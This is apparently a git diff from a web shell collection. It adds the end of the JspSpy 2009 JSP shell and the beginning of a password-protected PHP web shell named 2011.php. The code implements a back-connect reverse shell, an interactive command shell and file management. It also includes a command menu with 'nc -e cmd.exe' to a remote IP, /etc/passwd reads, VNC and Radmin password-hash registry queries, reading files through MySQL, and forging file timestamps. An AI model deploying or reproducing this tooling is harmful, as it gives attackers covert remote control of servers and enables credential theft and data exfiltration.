+"          <input name=\"ip\" id=\"ip\" type=\"text\" class=\"input\" size=\"20\" value=\""+ip+"\" />"+
+"          Your Port :"+
+"          <input name=\"port\" id=\"port\" type=\"text\" class=\"input\" size=\"20\" value=\""+port+"\" />Program To Back :"+
+"          <input name=\"program\" id=\"program\" type=\"text\" value=\""+program+"\" class=\"input\" size=\"20\" value=\"d\" /></td>"+
+"      </tr>"+
+"      <tr align=\"center\">"+
+"        <td colspan=\"2\"><br/>"+
+"          <input type=\"submit\" name=\"FJE\" value=\"Connect\" id=\"FJE\" class=\"bt\" />"+
+"    </td>"+
+"    </tr>"+
+"	</table>"+
+"    </div>"+
+"</td>"+
+"</tr>"+
+"</table>"+
+"</form>");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class BackConnectInvoker extends DefaultInvoker {
+public boolean doAfter(){return false;}
+public boolean doBefore(){return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+String ip = request.getParameter("ip");
+String port = request.getParameter("port");
+String program = request.getParameter("program");
+if (Util.isEmpty(ip) || Util.isEmpty(program) || !Util.isInteger(port))
+return;
+Socket socket = new Socket(ip,Integer.parseInt(port));
+Process process = Runtime.getRuntime().exec(program);
+(new StreamConnector(process.getInputStream(), socket.getOutputStream())).start();
+(new StreamConnector(socket.getInputStream(), process.getOutputStream())).start();
+JSession.setAttribute("done","Back Connect Success!");
+JSession.setAttribute("ip",ip);
+JSession.setAttribute("port",port);
+JSession.setAttribute("program",program);
+response.sendRedirect(SHELL_NAME+"?o=vbc");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class JspEnvInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"+
+"      <tr>"+
+"        <td><h2 id=\"Ninty_H2_Title\">System Properties &gt;&gt;</h2>"+
+"          <div id=\"ghaB\">"+
+"            <hr style=\" border: 1px solid #ddd;height:0px;\"/>"+
+"            <ul id=\"Ninty_Ul_Sys\" class=\"info\">");
+Properties pro = System.getProperties();
+Enumeration names = pro.propertyNames();
+while (names.hasMoreElements()){
+String name = (String)names.nextElement();
+out.println("<li><u>"+Util.htmlEncode(name)+" : </u>"+Util.htmlEncode(pro.getProperty(name))+"</li>");
+}
+out.println("</ul><h2 id=\"Ninty_H2_Mac\">System Environment &gt;&gt;</h2><hr style=\" border: 1px solid #ddd;height:0px;\"/><ul id=\"Ninty_Ul_Sys\" class=\"info\">");
+Map<String,String> envs = System.getenv();
+Set<Map.Entry<String,String>> entrySet = envs.entrySet();
+for (Map.Entry<String,String> en:entrySet) {
+out.println("<li><u>"+Util.htmlEncode(en.getKey())+" : </u>"+Util.htmlEncode(en.getValue())+"</li>");
+}
+out.println("</ul></div></td>"+
+"      </tr>"+
+"    </table>");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class TopInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+out.println("<form action=\""+SHELL_NAME+"\" method=\"post\" name=\"doForm\"></form>"+
+"<table width=\"100%\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\">"+
+"	<tr class=\"head\">"+
+"		<td><span style=\"float:right;\"><a href=\"http://www.forjj.com\" target=\"_blank\">JspSpy Ver: 2009</a></span>"+request.getHeader("host")+" ("+InetAddress.getLocalHost().getHostAddress()+")</td>"+
+"	</tr>"+
+"	<tr class=\"alt1\">"+
+"		<td><a href=\"javascript:doPost({o:'logout'});\">Logout</a> | "+
+"			<a href=\"javascript:doPost({o:'fileList'});\">File Manager</a> | "+
+"			<a href=\"javascript:doPost({o:'vConn'});\">DataBase Manager</a> | "+
+"			<a href=\"javascript:doPost({o:'vs'});\">Execute Command</a> | "+
+"			<a href=\"javascript:doPost({o:'vso'});\">Shell OnLine</a> | "+
+"			<a href=\"javascript:doPost({o:'vbc'});\">Back Connect</a> | "+
+"			<a href=\"javascript:doPost({o:'vPortScan'});;\">Port Scan</a> | "+
+"			<a href=\"javascript:doPost({o:'vd'});\">Download Remote File</a> | "+
+"			<a href=\"javascript:;doPost({o:'clipboard'});\">ClipBoard</a> | "+
+"			<a href=\"javascript:doPost({o:'vRemoteControl'});\">Remote Control</a> | "+
+"			<a href=\"javascript:doPost({o:'vmp'});\">Port Map</a> | "+
+"			<a href=\"javascript:doPost({o:'jspEnv'});\">JSP Env</a> "+
+"	</tr>"+
+"</table>");
+if (JSession.getAttribute(MSG) != null) {
+Util.outMsg(out,JSession.getAttribute(MSG).toString());
+JSession.removeAttribute(MSG);
+} 
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class VOnLineShellInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+out.println("<script>"+
+"				function $(id) {"+
+"					return document.getElementById(id);"+
+"				}"+
+"				var ie = window.navigator.userAgent.toLowerCase().indexOf(\"msie\") != -1;"+
+"				window.onload = function(){"+
+"					setInterval(function(){"+
+"						if ($(\"autoscroll\").checked)"+
+"						{"+
+"							var f = window.frames[\"echo\"];"+
+"							if (f && f.document && f.document.body)"+
+"							{"+
+"								if (!ie)"+
+"								{"+
+"									if (f.document.body.offsetHeight)"+
+"									{"+
+"										f.scrollTo(0,parseInt(f.document.body.offsetHeight)+1);"+
+"									}"+
+"								} else {"+
+"									f.scrollTo(0,parseInt(f.document.body.scrollHeight)+1);"+
+"								}"+
+"							}"+
+"						}"+
+"					},500);"+
+"				}"+
+"			</script>");
+out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"+
+"  <tr>"+
+"    <td>");
+out.println("<h2>Shell OnLine &raquo;</h2><br/>");
+out.println("<form action=\""+SHELL_NAME+"\" method=\"post\" target=\"echo\" onsubmit=\"$('cmd').focus()\">"+
+"			<input type=\"submit\" value=\" start \" class=\"bt\">"+
+"				<input type=\"text\" name=\"exe\" style=\"width:300px\" class=\"input\" value=\"c:\\windows\\system32\\cmd.exe\"/>"+
+"				<input type=\"hidden\" name=\"o\" value=\"online\"/><input type=\"hidden\" name=\"type\" value=\"start\"/><span class=\"tip\">Notice ! If You Are Using IE , You Must Input A Command First After You Start Or You Will Not See The Echo</span>"+
+"			</form>"+
+"			<hr/>"+
+"				<iframe class=\"secho\" name=\"echo\" src=\"\">"+
+"				</iframe>"+
+"				<form action=\""+SHELL_NAME+"\" method=\"post\" onsubmit=\"this.submit();$('cmd').value='';return false;\" target=\"asyn\">"+
+"					<input type=\"text\" id=\"cmd\" name=\"cmd\" class=\"input\" style=\"width:80%\">"+
+"					<input name=\"o\" id=\"o\" type=\"hidden\" value=\"online\"/><input type=\"hidden\" id=\"ddtype\" name=\"type\" value=\"ecmd\"/>"+
+"					<select onchange=\"$('cmd').value = this.value;$('cmd').focus()\">"+
+"						<option value=\"\" selected> </option>"+
+"						<option value=\"uname -a\">uname -a</option>"+
+"						<option value=\"cat /etc/issue\">issue</option>"+
+"						<option value=\"cat /etc/passwd\">passwd</option>"+
+"						<option value=\"netstat -an\">netstat -an</option>"+
+"						<option value=\"net user\">net user</option>"+
+"						<option value=\"tasklist\">tasklist</option>"+
+"						<option value=\"tasklist /svc\">tasklist /svc</option>"+
+"						<option value=\"net start\">net start</option>"+
+"						<option value=\"net stop policyagent /yes\">net stop</option>"+
+"						<option value=\"nbtstat -A IP\">nbtstat -A</option>"+
+"						<option value='reg query \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v \"PortNumber\"'>reg query</option>"+
+"						<option value='reg query \"HKEY_LOCAL_MACHINE\\SYSTEM\\RAdmin\\v2.0\\Server\\Parameters\\\" /v \"Parameter\"'>radmin hash</option>"+
+"						<option value='reg query \"HKEY_LOCAL_MACHINE\\SOFTWARE\\RealVNC\\WinVNC4\" /v \"password\"'>vnc hash</option>"+
+"						<option value=\"nc -e cmd.exe 192.168.230.1 4444\">nc</option>"+
+"						<option value=\"lcx -slave 192.168.230.1 4444 127.0.0.1 3389\">lcx</option>"+
+"						<option value=\"systeminfo\">systeminfo</option>"+
+"						<option value=\"net localgroup\">view groups</option>"+
+"						<option value=\"net localgroup administrators\">view admins</option>"+
+"					</select>"+
+"					<input type=\"checkbox\" checked=\"checked\" id=\"autoscroll\">Auto Scroll"+
+"					<input type=\"button\" value=\"Stop\" class=\"bt\" onclick=\"$('ddtype').value='stop';this.form.submit()\">"+
+"				</form>"+
+"			<iframe style=\"display:none\" name=\"asyn\"></iframe>"
+);
+out.println("    </td>"+
+"  </tr>"+
+"</table>");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class OnLineInvoker extends DefaultInvoker {
+public boolean doBefore(){return false;}
+public boolean doAfter(){return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+String type = request.getParameter("type");
+if (Util.isEmpty(type))
+return;
+if (type.toLowerCase().equals("start")) {
+String exe = request.getParameter("exe");
+if (Util.isEmpty(exe))
+return;
+Process pro = Runtime.getRuntime().exec(exe);
+ByteArrayOutputStream outs = new ByteArrayOutputStream();
+response.setContentLength(100000000);
+response.setContentType("text/html;charset="+Charset.defaultCharset().name());
+OnLineProcess olp = new OnLineProcess(pro);
+JSession.setAttribute(SHELL_ONLINE,olp);
+new OnLineConnector(new ByteArrayInputStream(outs.toByteArray()),pro.getOutputStream(),"exeOclientR",olp).start();
+new OnLineConnector(pro.getInputStream(),response.getOutputStream(),"exeRclientO",olp).start();
+new OnLineConnector(pro.getErrorStream(),response.getOutputStream(),"exeRclientO",olp).start();//閿欒淇℃伅娴併��
+Thread.sleep(1000 * 60 * 60 * 24);
+} else if (type.equals("ecmd")) {
+Object o = JSession.getAttribute(SHELL_ONLINE);
+String cmd = request.getParameter("cmd");
+if (Util.isEmpty(cmd))
+return;
+if (o == null)
+return;
+OnLineProcess olp = (OnLineProcess)o;
+olp.setCmd(cmd);
+} else {
+Object o = JSession.getAttribute(SHELL_ONLINE);
+if (o == null)
+return;
+OnLineProcess olp = (OnLineProcess)o;
+olp.stop();
+}
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+
+static{
+ins.put("script",new ScriptInvoker());
+ins.put("before",new BeforeInvoker());
+ins.put("after",new AfterInvoker());
+ins.put("deleteBatch",new DeleteBatchInvoker());
+ins.put("clipboard",new ClipBoardInvoker());
+ins.put("vRemoteControl",new VRemoteControlInvoker());
+ins.put("gc",new GcInvoker());
+ins.put("vPortScan",new VPortScanInvoker());
+ins.put("portScan",new PortScanInvoker());
+ins.put("vConn",new VConnInvoker());
+ins.put("dbc",new DbcInvoker());
+ins.put("executesql",new ExecuteSQLInvoker());
+ins.put("vLogin",new VLoginInvoker());
+ins.put("login",new LoginInvoker());
+ins.put("filelist", new FileListInvoker());
+ins.put("logout",new LogoutInvoker());
+ins.put("upload",new UploadInvoker());
+ins.put("copy",new CopyInvoker());
+ins.put("bottom",new BottomInvoker());
+ins.put("vCreateFile",new VCreateFileInvoker());
+ins.put("vEdit",new VEditInvoker());
+ins.put("createFile",new CreateFileInvoker());
+ins.put("vEditProperty",new VEditPropertyInvoker());
+ins.put("editProperty",new EditPropertyInvoker());
+ins.put("vs",new VsInvoker());
+ins.put("shell",new ShellInvoker());
+ins.put("down",new DownInvoker());
+ins.put("vd",new VdInvoker());
+ins.put("downRemote",new DownRemoteInvoker());
+ins.put("index",new IndexInvoker());
+ins.put("mkdir",new MkDirInvoker());
+ins.put("move",new MoveInvoker());
+ins.put("removedir",new RemoteDirInvoker());
+ins.put("packBatch",new PackBatchInvoker());
+ins.put("pack",new PackInvoker());
+ins.put("unpack",new UnPackInvoker());
+ins.put("vmp",new VmpInvoker());
+ins.put("vbc",new VbcInvoker());
+ins.put("backConnect",new BackConnectInvoker());
+ins.put("jspEnv",new JspEnvInvoker());
+ins.put("smp",new SmpInvoker());
+ins.put("mapPort",new MapPortInvoker());
+ins.put("top",new TopInvoker());
+ins.put("vso",new VOnLineShellInvoker());
+ins.put("online",new OnLineInvoker());
+}
+%>
+<%
+try {
+String o = request.getParameter("o");
+if (!Util.isEmpty(o)) {
+Invoker in = ins.get(o);
+if (in == null) {
+response.sendRedirect(SHELL_NAME+"?o=index");
+} else {
+if (in.doBefore()) {
+String path = request.getParameter("folder");
+if (!Util.isEmpty(path))
+session.setAttribute(CURRENT_DIR,path);
+ins.get("before").invoke(request,response,session);
+ins.get("script").invoke(request,response,session);
+ins.get("top").invoke(request,response,session);
+}
+in.invoke(request,response,session);
+if (!in.doAfter()) {
+return;
+}else{
+ins.get("bottom").invoke(request,response,session);
+ins.get("after").invoke(request,response,session);
+}
+}
+} else {
+response.sendRedirect(SHELL_NAME+"?o=index");
+}					
+} catch (Exception e) {
+ByteArrayOutputStream bout = new ByteArrayOutputStream();
+e.printStackTrace(new PrintStream(bout));
+session.setAttribute(CURRENT_DIR,SHELL_DIR);
+Util.outMsg(out,Util.htmlEncode(new String(bout.toByteArray())).replace("\n","<br/>"),"left");
+bout.close();
+out.flush();
+ins.get("bottom").invoke(request,response,session);
+ins.get("after").invoke(request,response,session);
+}
+%>
\ No newline at end of file
diff --git a/php/2011.php b/php/2011.php
new file mode 100644
index 0000000..7f52eaa
--- /dev/null
+++ b/php/2011.php
@@ -0,0 +1,2144 @@
+<?php
+error_reporting(7);
+@set_magic_quotes_runtime(0);
+ob_start();
+$mtime = explode(' ', microtime());
+$starttime = $mtime[1] + $mtime[0];
+define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/');
+define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
+define('IS_COM', class_exists('COM') ? 1 : 0 );
+define('IS_GPC', get_magic_quotes_gpc());
+$dis_func = get_cfg_var('disable_functions');
+define('IS_PHPINFO', (!eregi("phpinfo",$dis_func)) ? 1 : 0 );
+@set_time_limit(0);
+
+foreach($_POST as $key => $value) {
+	if (IS_GPC) {
+		$value = s_array($value);
+	}
+	$$key = $value;
+}
+/*===================== 程序配置 =====================*/
+
+//echo encode_pass('angel');exit;
+//angel = ec38fe2a8497e0a8d6d349b3533038cb
+// 如果需要密码验证,请修改登陆密码,留空为不需要验证
+$pass  = 'ec38fe2a8497e0a8d6d349b3533038cb'; //angel
+
+//如您对 cookie 作用范围有特殊要求, 或登录不正常, 请修改下面变量, 否则请保持默认
+// cookie 前缀
+$cookiepre = '';
+// cookie 作用域
+$cookiedomain = '';
+// cookie 作用路径
+$cookiepath = '/';
+// cookie 有效期
+$cookielife = 86400;
+
+//程序搜索可写文件的类型
+!$writabledb && $writabledb = 'php,cgi,pl,asp,inc,js,html,htm,jsp';
+/*===================== 配置结束 =====================*/
+
+$charsetdb = array('','armscii8','ascii','big5','binary','cp1250','cp1251','cp1256','cp1257','cp850','cp852','cp866','cp932','dec8','euc-jp','euc-kr','gb2312','gbk','geostd8','greek','hebrew','hp8','keybcs2','koi8r','koi8u','latin1','latin2','latin5','latin7','macce','macroman','sjis','swe7','tis620','ucs2','ujis','utf8');
+if ($charset == 'utf8') {
+	header("content-Type: text/html; charset=utf-8");
+} elseif ($charset == 'big5') {
+	header("content-Type: text/html; charset=big5");
+} elseif ($charset == 'gbk') {
+	header("content-Type: text/html; charset=gbk");
+} elseif ($charset == 'latin1') {
+	header("content-Type: text/html; charset=iso-8859-2");
+} elseif ($charset == 'euc-kr') {
+	header("content-Type: text/html; charset=euc-kr");
+} elseif ($charset == 'euc-jp') {
+	header("content-Type: text/html; charset=euc-jp");
+}
+
+$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
+$timestamp = time();
+
+/*===================== 身份验证 =====================*/
+if ($action == "logout") {
+	scookie('loginpass', '', -86400 * 365);
+	@header('Location: '.$self);
+	exit;
+}
+if($pass) {
+	if ($action == 'login') {
+		if ($pass == encode_pass($password)) {
+			scookie('loginpass',encode_pass($password));
+			@header('Location: '.$self);
+			exit;
+		}
+	}
+	if ($_COOKIE['loginpass']) {
+		if ($_COOKIE['loginpass'] != $pass) {
+			loginpage();
+		}
+	} else {
+		loginpage();
+	}
+}
+/*===================== 验证结束 =====================*/
+
+$errmsg = '';
+!$action && $action = 'file';
+
+// 查看PHPINFO
+if ($action == 'phpinfo') {
+	if (IS_PHPINFO) {
+		phpinfo();
+		exit;
+	} else {
+		$errmsg = 'phpinfo() function has non-permissible';
+	}
+}
+
+// 下载文件
+if ($doing == 'downfile' && $thefile) {
+	if (!@file_exists($thefile)) {
+		$errmsg = 'The file you want Downloadable was nonexistent';
+	} else {
+		$fileinfo = pathinfo($thefile);
+		header('Content-type: application/x-'.$fileinfo['extension']);
+		header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
+		header('Content-Length: '.filesize($thefile));
+		@readfile($thefile);
+		exit;
+	}
+}
+
+// 直接下载备份数据库
+if ($doing == 'backupmysql' && !$saveasfile) {
+	if (!$table) {
+		$errmsg ='Please choose the table';
+	} else {
+		$mysqllink = mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
+		$filename = basename($dbname.'.sql');
+		header('Content-type: application/unknown');
+		header('Content-Disposition: attachment; filename='.$filename);
+		foreach($table as $k => $v) {
+			if ($v) {
+				sqldumptable($v);
+			}
+		}
+		mysql_close();
+		exit;
+	}
+}
+
+// 通过MYSQL下载文件
+if($doing=='mysqldown'){
+	if (!$dbname) {
+		$errmsg = 'Please input dbname';
+	} else {
+		$mysqllink = mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
+		if (!file_exists($mysqldlfile)) {
+			$errmsg = 'The file you want Downloadable was nonexistent';
+		} else {
+			$result = q("select load_file('$mysqldlfile');");
+			if(!$result){
+				q("DROP TABLE IF EXISTS tmp_angel;");
+				q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);");
+				//用时间戳来表示截断,避免出现读取自身或包含__angel_1111111111_eof__的文件时不完整的情况
+				q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';");
+				$result = q("select content from tmp_angel");
+				q("DROP TABLE tmp_angel");
+			}
+			$row = @mysql_fetch_array($result);
+			if (!$row) {
+				$errmsg = 'Load file failed '.mysql_error();
+			} else {
+				$fileinfo = pathinfo($mysqldlfile);
+				header('Content-type: application/x-'.$fileinfo['extension']);
+				header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
+				header("Accept-Length: ".strlen($row[0]));
+				echo $row[0];
+				exit;
+			}
+		}
+	}
+}
+
+?>
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=gbk">
+<title><?php echo $action.' - '.$_SERVER['HTTP_HOST'];?></title>
+<style type="text/css">
+body,td{font: 12px Arial,Tahoma;line-height: 16px;}
+.input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;}
+.area{font:12px 'Courier New', Monospace;background:#fff;border: 1px solid #666;padding:2px;}
+.bt {border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;}
+a {color: #00f;text-decoration:underline;}
+a:hover{color: #f00;text-decoration:none;}
+.alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 15px 5px 5px;}
+.alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f9f9f9;padding:5px 15px 5px 5px;}
+.focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 15px 5px 5px;}
+.head td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 15px 5px 5px;font-weight:bold;}
+.head td span{font-weight:normal;}
+.infolist {padding:10px;margin:10px 0 20px 0;background:#F1F1F1;border:1px solid #ddd;}
+form{margin:0;padding:0;}
+h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
+ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
+u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
+.drives{padding:5px;}
+.drives span {margin:auto 7px;}
+</style>
+<script type="text/javascript">
+function CheckAll(form) {
+	for(var i=0;i<form.elements.length;i++) {
+		var e = form.elements[i];
+		if (e.name != 'chkall')
+		e.checked = form.chkall.checked;
+    }
+}
+function $(id) {
+	return document.getElementById(id);
+}
+function createdir(){
+	var newdirname;
+	newdirname = prompt('Please input the directory name:', '');
+	if (!newdirname) return;
+	$('createdir').newdirname.value=newdirname;
+	$('createdir').submit();
+}
+function fileperm(pfile){
+	var newperm;
+	newperm = prompt('Current file:'+pfile+'\nPlease input new attribute:', '');
+	if (!newperm) return;
+	$('fileperm').newperm.value=newperm;
+	$('fileperm').pfile.value=pfile;
+	$('fileperm').submit();
+}
+function copyfile(sname){
+	var tofile;
+	tofile = prompt('Original file:'+sname+'\nPlease input object file (fullpath):', '');
+	if (!tofile) return;
+	$('copyfile').tofile.value=tofile;
+	$('copyfile').sname.value=sname;
+	$('copyfile').submit();
+}
+function rename(oldname){
+	var newfilename;
+	newfilename = prompt('Former file name:'+oldname+'\nPlease input new filename:', '');
+	if (!newfilename) return;
+	$('rename').newfilename.value=newfilename;
+	$('rename').oldname.value=oldname;
+	$('rename').submit();
+}
+function dofile(doing,thefile,m){
+	if (m && !confirm(m)) {
+		return;
+	}
+	$('filelist').doing.value=doing;
+	if (thefile){
+		$('filelist').thefile.value=thefile;
+	}
+	$('filelist').submit();
+}
+function createfile(nowpath){
+	var filename;
+	filename = prompt('Please input the file name:', '');
+	if (!filename) return;
+	opfile('editfile',nowpath + filename,nowpath);
+}
+function opfile(action,opfile,dir){
+	$('fileopform').action.value=action;
+	$('fileopform').opfile.value=opfile;
+	$('fileopform').dir.value=dir;
+	$('fileopform').submit();
+}
+function godir(dir,view_writable){
+	if (view_writable) {
+		$('godir').view_writable.value=view_writable;
+	}
+	$('godir').dir.value=dir;
+	$('godir').submit();
+}
+function getsize(getdir,dir){
+	$('getsize').getdir.value=getdir;
+	$('getsize').dir.value=dir;
+	$('getsize').submit();
+}
+function editrecord(action, base64, tablename){
+	if (action == 'del') {		
+		if (!confirm('Is or isn\'t deletion record?')) return;
+	}
+	$('recordlist').doing.value=action;
+	$('recordlist').base64.value=base64;
+	$('recordlist').tablename.value=tablename;
+	$('recordlist').submit();
+}
+function moddbname(dbname) {
+	if(!dbname) return;
+	$('setdbname').dbname.value=dbname;
+	$('setdbname').submit();
+}
+function settable(tablename,doing,page) {
+	if(!tablename) return;
+	if (doing) {
+		$('settable').doing.value=doing;
+	}
+	if (page) {
+		$('settable').page.value=page;
+	}
+	$('settable').tablename.value=tablename;
+	$('settable').submit();
+}
+function s(action,nowpath,p1,p2,p3,p4,p5) {
+	if(action) $('opform').action.value=action;
+	if(nowpath) $('opform').nowpath.value=nowpath;
+	if(p1) $('opform').p1.value=p1;
+	if(p2) $('opform').p2.value=p2;
+	if(p3) $('opform').p3.value=p3;
+	if(p4) $('opform').p4.value=p4;
+	if(p5) $('opform').p4.value=p5;
+}
+function g(action,nowpath,p1,p2,p3,p4,p5) {
+	if(!action) return;
+	s(action,nowpath,p1,p2,p3,p4,p5);
+	$('opform').submit();
+}
+</script>
+</head>
+<body style="margin:0;table-layout:fixed; word-break:break-all">
+<?php
+formhead(array('name'=>'opform'));
+makehide('action', $action);
+makehide('nowpath', $nowpath);
+makehide('p1', $p1);
+makehide('p2', $p2);
+makehide('p3', $p3);
+makehide('p4', $p4);
+makehide('p5', $p5);
+formfoot();
+
+if(!function_exists('posix_getegid')) {
+	$user = @get_current_user();
+	$uid = @getmyuid();
+	$gid = @getmygid();
+	$group = "?";
+} else {
+	$uid = @posix_getpwuid(@posix_geteuid());
+	$gid = @posix_getgrgid(@posix_getegid());
+	$user = $uid['name'];
+	$uid = $uid['uid'];
+	$group = $gid['name'];
+	$gid = $gid['gid'];
+}
+
+?>
+<table width="100%" border="0" cellpadding="0" cellspacing="0">
+	<tr class="head">
+		<td><span style="float:right;"><?php echo @php_uname();?> / User:<?php echo $uid.' ( '.$user.' ) / Group: '.$gid.' ( '.$group.' )';?></span><?php echo $_SERVER['HTTP_HOST'];?> (<?php echo gethostbyname($_SERVER['SERVER_NAME']);?>)</td>
+	</tr>
+	<tr class="alt1">
+		<td>
+			<span style="float:right;">PHP <?php echo PHP_VERSION;?> / Safe Mode:<?php echo getcfg('safe_mode');?></span>
+			<a href="javascript:g('logout');">Logout</a> | 
+			<a href="javascript:g('file');">File Manager</a> | 
+			<a href="javascript:g('mysqladmin');">MYSQL Manager</a> | 
+			<a href="javascript:g('sqlfile');">MySQL Upload &amp; Download</a> | 
+			<a href="javascript:g('shell');">Execute Command</a> | 
+			<a href="javascript:g('phpenv');">PHP Variable</a> | 
+			<a href="javascript:g('portscan');">Port Scan</a> | 
+			<a href="javascript:g('secinfo');">Security information</a> | 
+			<a href="javascript:g('eval');">Eval PHP Code</a>
+			<?php if (!IS_WIN) {?> | <a href="javascript:g('backconnect');">Back Connect</a><?php }?>
+		</td>
+	</tr>
+</table>
+<table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
+<?php
+$errmsg && m($errmsg);
+
+// 获取当前路径
+if (!$dir) {
+	$dir = $_SERVER["DOCUMENT_ROOT"] ? $_SERVER["DOCUMENT_ROOT"] : '.';
+}
+$nowpath = getPath(SA_ROOT, $dir);
+if (substr($dir, -1) != '/') {
+	$dir = $dir.'/';
+}
+
+if ($action == 'file') {
+
+	// 判断读写情况
+	$dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable';
+
+	// 创建目录
+	if ($newdirname) {
+		$mkdirs = $nowpath.$newdirname;
+		if (file_exists($mkdirs)) {
+			m('Directory has already existed');
+		} else {
+			m('Directory created '.(@mkdir($mkdirs,0777) ? 'success' : 'failed'));
+			@chmod($mkdirs,0777);
+		}
+	}
+
+	// 上传文件
+	elseif ($doupfile) {
+		m('File upload '.(@copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed'));
+	}
+
+	// 编辑文件
+	elseif ($editfilename && $filecontent) {
+		$fp = @fopen($editfilename,'w');
+		m('Save file '.(@fwrite($fp,$filecontent) ? 'success' : 'failed'));
+		@fclose($fp);
+	}
+
+	// 编辑文件属性
+	elseif ($pfile && $newperm) {
+		if (!file_exists($pfile)) {
+			m('The original file does not exist');
+		} else {
+			$newperm = base_convert($newperm,8,10);
+			m('Modify file attributes '.(@chmod($pfile,$newperm) ? 'success' : 'failed'));
+		}
+	}
+
+	// 改名
+	elseif ($oldname && $newfilename) {
+		$nname = $nowpath.$newfilename;
+		if (file_exists($nname) || !file_exists($oldname)) {
+			m($nname.' has already existed or original file does not exist');
+		} else {
+			m(basename($oldname).' renamed '.basename($nname).(@rename($oldname,$nname) ? ' success' : 'failed'));
+		}
+	}
+
+	// 复制文件
+	elseif ($sname && $tofile) {
+		if (file_exists($tofile) || !file_exists($sname)) {
+			m('The goal file has already existed or original file does not exist');
+		} else {
+			m(basename($tofile).' copied '.(@copy($sname,$tofile) ? basename($tofile).' success' : 'failed'));
+		}
+	}
+
+	// 克隆时间
+	elseif ($curfile && $tarfile) {
+		if (!@file_exists($curfile) || !@file_exists($tarfile)) {
+			m('The goal file has already existed or original file does not exist');
+		} else {
+			$time = @filemtime($tarfile);
+			m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
+		}
+	}
+
+	// 自定义时间
+	elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {
+		if (!@file_exists($curfile)) {
+			m(basename($curfile).' does not exist');
+		} else {
+			$time = strtotime("$year-$month-$day $hour:$minute:$second");
+			m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
+		}
+	}
+
+	// 批量删除文件
+	elseif($doing == 'delfiles') {
+		if ($dl) {
+			$dfiles='';
+			$succ = $fail = 0;
+			foreach ($dl as $filepath) {
+				if (is_dir($filepath)) {
+					if (@deltree($filepath)) {
+						$succ++;
+					} else {
+						$fail++;
+					}
+				} else {
+					if (@unlink($filepath)) {
+						$succ++;
+					} else {
+						$fail++;
+					}
+				}
+			}
+			m('Deleted folder/file have finished,choose '.count($dl).' success '.$succ.' fail '.$fail);
+		} else {
+			m('Please select folder/file(s)');
+		}
+	}
+
+	//操作完毕
+	formhead(array('name'=>'createdir'));
+	makehide('newdirname');
+	makehide('dir',$nowpath);
+	formfoot();
+	formhead(array('name'=>'fileperm'));
+	makehide('newperm');
+	makehide('pfile');
+	makehide('dir',$nowpath);
+	formfoot();
+	formhead(array('name'=>'copyfile'));
+	makehide('sname');
+	makehide('tofile');
+	makehide('dir',$nowpath);
+	formfoot();
+	formhead(array('name'=>'rename'));
+	makehide('oldname');
+	makehide('newfilename');
+	makehide('dir',$nowpath);
+	formfoot();
+	formhead(array('name'=>'fileopform', 'target'=>'_blank'));
+	makehide('action');
+	makehide('opfile');
+	makehide('dir');
+	formfoot();
+	formhead(array('name'=>'getsize'));
+	makehide('getdir');
+	makehide('dir');
+	formfoot();
+
+	$free = @disk_free_space($nowpath);
+	!$free && $free = 0;
+	$all = @disk_total_space($nowpath);
+	!$all && $all = 0;
+	$used = $all-$free;
